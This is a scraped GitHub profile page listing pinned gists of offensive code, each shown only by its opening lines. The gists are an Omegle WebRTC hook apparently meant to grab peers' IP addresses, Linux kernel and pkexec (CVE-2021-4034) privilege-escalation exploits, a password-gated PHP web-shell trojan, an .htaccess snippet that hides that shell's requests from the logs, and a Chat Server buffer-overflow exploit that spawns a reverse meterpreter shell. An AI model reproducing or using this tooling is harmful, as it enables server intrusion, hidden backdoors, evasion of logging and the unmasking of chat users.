Pinned Loading
-
script-omegle.js
script-omegle.js 1window.oRTCPeerConnection = window.oRTCPeerConnection || window.RTCPeerConnection
2window.RTCPeerConnection = function(…args) {
3const pc = new window.oRTCPeerConnection(…args)
4pc.oaddIceCandidate = pc.addIceCandidate
5pc.addIceCandidate = function(iceCandidate, …rest) {
-
Linux Kernel - local privilege escal...
Linux Kernel - local privilege escalation 1/*
2* #Linux Kernel Exploit
3* Hi Hacker, Happy hacking VB
4*
5*
-
blasty-vs-pkexec.c
blasty-vs-pkexec.c 1/*
2* blasty-vs-pkexec.c
3* ------------------------------------------------
4* PoC for CVE-2021-4034, shout out to Qualys
5*
-
Simple trojan in PHP.error_reporting...
Simple trojan in PHP.error_reporting(0); 1<?php
2error_reporting(0);
3$action = $_GET['cmd'];
4$pw = $_GET['pw'];
5$password = "7a3b4197c700b7a94efef0a0590f465664ff210e120156a8c70913c1302fc06fa1bc85cffbf2fb113f99323f08e91489dd4531a0c3657b22fdc065f87b799f5b";
-
http-htaccess.php
http-htaccess.php 1SetEnvIf Request_URI "^/tmpdir/tempfile\.php$" dontlog
2<Limit GET POST HEAD>
3order deny,allow
4deny from all
5allow from 127.0.0.1 (or the remote ip of the server).
-
Chat Server - Remote Stack Buffer Ov...
Chat Server - Remote Stack Buffer Overflow 1# Exploit Title: Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)
2# Usage: python remCS.py <victim-ip> <port>
3# Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990
4# CVE: CVE-2004-2466
5# Installer: http://www.echatserver.com/
Something went wrong, please refresh the page to try again.
If the problem persists, check the GitHub status page or contact support.
If the problem persists, check the GitHub status page or contact support.